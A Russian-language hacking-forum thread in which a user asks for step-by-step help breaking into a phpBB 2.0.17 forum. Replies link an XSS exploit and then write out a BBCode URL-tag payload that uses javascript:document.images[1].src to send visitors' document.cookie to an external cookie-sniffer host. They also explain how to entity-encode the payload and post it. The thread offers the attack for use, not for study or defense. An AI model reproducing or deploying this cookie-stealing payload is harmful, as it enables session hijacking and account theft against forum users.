Взлом phpbb 2.0.17

люди добрые кто может подробно описать как взломать форум phpbb версии 2.0.17 использую сплойт который есть на этом сайте для этого форума!

очень интересно описание токо с чего начать что делать и чем закончить! просто как то не понятно какие программы использовать какие тонкости нужно знать и вообще как его кушать )))
в инете что то не могу найти подробного описания как и куда жать все как то облачно описывается к сожалению!

или может кто может дать ссылку на подробное видео по взлому этой версии...

буду очень признателен тем кому не лень описать как это делать...

 

Сверху жми video.antichat.ru, затем справа, там где написано "search" введи "phpbb".

 

там я что то не вижу видео для взлома именно 17 версии

 

Тебе по-моему наведение нужно или сложно посмотреть на видео, найти нужный сплойт и сделать по аналогу? Я поражаюсь русскому народу. Мало того что всё на халяву тянут, так ещё разжуй им и в рот положи. Там столько видео по взлому ПХПББ, что совсем ничего не понять просто невозможно.

 

да вот именно хотелось что бы разжевали

посмотрел что то понял что то нет!!!!! все что пробовал по подобию делать не получается

 

17 это число меньше либо равное 18, 19, 20 и тд..
Если написано сплойт <=2.0.19, то в данном случае <= означает, дословно "версии до 2.0.19 включительно". Если написано < 2.0.19, то это уже не включительно. По скольку версии программ являются дискретными величинами, то, например, ближайшая версия меньшая версии x.y.z будет версия x.y.(z-1).
Исключение составляют версии где z=0 или разработчики выпустили после x.y.z сразу x.y.(z+2) или даже x.(y+1).m. С каждым конкретным случаем надо разбираться отдельно, поэтому не стесняйся - спрашивай - здесь тебе с радостью помогут.
Наверное все таки сложно написал, если что не понял, сообщи - дам ссылки на хорошие книги итд.

 

1. Юзай поиск
2. XSS (настроен на античатовский сниффер):
mudaak.narod.ru/phpBB2.0.18.txt
З.Ы. Просто не знал как его сюда вставить. Пришлось залить в *.txt
Кстати работает до версии 2.0.18. Удачи!

 

podkashey и vorishka спасибки огромные!

podkashey кинь ссылки почетаемсс мож что нового для себя найду!!!


vorishka как я понимаю его просто нуна вставить в сообщение этот код который ты в ТХТ выложил? да и результат буит увиден в этом же посте или нуна буит где то еще смотреть?

 

Результат будешь смотреть в логах по адресу http://antichat.ru/sniff/log.php

Но для удобства лучше свой снифер сделать...

 

Как в этот код засунуть свой снифер ???

 

Регистрируй сниффер на http://s.netsec.ru
Затем
подставляй свой логин:

Code:

[B]:url(javascript:document.images[1].src="http://s.netsec.ru/ТУТ ТВОЙ ЛОГИН.gif?"[/B]

После идешь на http://quest.antichat.net/code.php, выбираешь HTML Entities Encode, вставляешь

Code:

[B]:url(javascript:document.images[1].src="http://s.netsec.ru/ТУТ ТВОЙ ЛОГИН.gif?"[/B]

То что получилось подставляй так:

Code:

[B][UR*L]http://www.[U*RL=http://google.com/style=display:none;background[SIZE=4][COLOR=Red]СЮДА[/COLOR][/SIZE]+document.cookie;&*#41;&*#32;]Link[/*URL][/*URL][/B]

Звездочки, естественно уберешь....

 

Всё сделал по пунктам, получилось так:

Ввожу получившийся код в сообщение вот что появляется:



Нажимаю на Link

Вылезает вот это:




Снифер пустой....